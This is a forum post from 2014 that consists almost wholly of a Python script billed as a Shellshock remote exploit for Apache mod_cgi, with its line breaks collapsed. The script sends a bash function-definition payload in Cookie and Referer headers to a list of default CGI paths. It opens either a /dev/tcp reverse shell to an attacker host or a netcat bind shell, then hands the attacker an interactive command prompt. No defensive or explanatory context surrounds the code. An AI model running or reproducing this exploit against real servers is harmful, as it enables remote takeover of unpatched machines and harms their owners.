Kalashnikov. Posted October 11, 2014 Report Share Posted October 11, 2014 #! /usr/bin/env pythonfrom socket import *from threading import Threadimport thread, time, httplib, urllib, sysstop = Falseproxyhost = ""proxyport = 0def usage(): print """ Shellshock apache mod_cgi remote exploitUsage:./exploit.py var=<value>Vars:rhost: victim hostrport: victim port for TCP shell bindinglhost: attacker host for TCP shell reversinglport: attacker port for TCP shell reversingpages: specific cgi vulnerable pages (separated by comma)proxy: host:port proxyPayloads:"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)Example:./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234./exploit.py payload=bind rhost=1.2.3.4 rport=1234Credits:Federico Galatolo 2014""" sys.exit(0)def exploit(lhost,lport,rhost,rport,payload,pages): headers = {"Cookie": payload, "Referer": payload} for page in pages: if stop: return print "[-] Trying exploit on : "+page if proxyhost != "": c = httplib.HTTPConnection(proxyhost,proxyport) c.request("GET","http://"+rhost+page,headers=headers) res = c.getresponse() else: c = httplib.HTTPConnection(rhost) c.request("GET",page,headers=headers) res = c.getresponse() if res.status == 404: print "[*] 404 on : "+page time.sleep(1)args = {}for arg in sys.argv[1:]: ar = arg.split("=") args[ar[0]] = ar[1]try: args['payload']except: usage()if args['payload'] == 'reverse': try: lhost = args['lhost'] lport = int(args['lport']) rhost = args['rhost'] payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &" except: usage()elif args['payload'] == 'bind': try: rhost = args['rhost'] rport = args['rport'] payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'" except: usage()else: print "[*] Unsupported payload" usage()try: pages = args['pages'].split(",")except: pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]try: proxyhost,proxyport = args['proxy'].split(":")except: passif args['payload'] == 'reverse': serversocket = socket(AF_INET, SOCK_STREAM) buff = 1024 addr = (lhost, lport) serversocket.bind(addr) serversocket.listen(10) print "[!] Started reverse shell handler" thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))if args['payload'] == 'bind': serversocket = socket(AF_INET, SOCK_STREAM) addr = (rhost,int(rport)) thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))buff = 1024while True: if args['payload'] == 'reverse': clientsocket, clientaddr = serversocket.accept() print "[!] Successfully exploited" print "[!] Incoming connection from "+clientaddr[0] stop = True clientsocket.settimeout(3) while True: reply = raw_input(clientaddr[0]+"> ") clientsocket.sendall(reply+"\n") try: data = clientsocket.recv(buff) print data except: pass if args['payload'] == 'bind': try: serversocket = socket(AF_INET, SOCK_STREAM) time.sleep(1) serversocket.connect(addr) print "[!] Successfully exploited" print "[!] Connected to "+rhost stop = True serversocket.settimeout(3) while True: reply = raw_input(rhost+"> ") serversocket.sendall(reply+"\n") data = serversocket.recv(buff) print data except: pass Quote Link to comment Share on other sites More sharing options...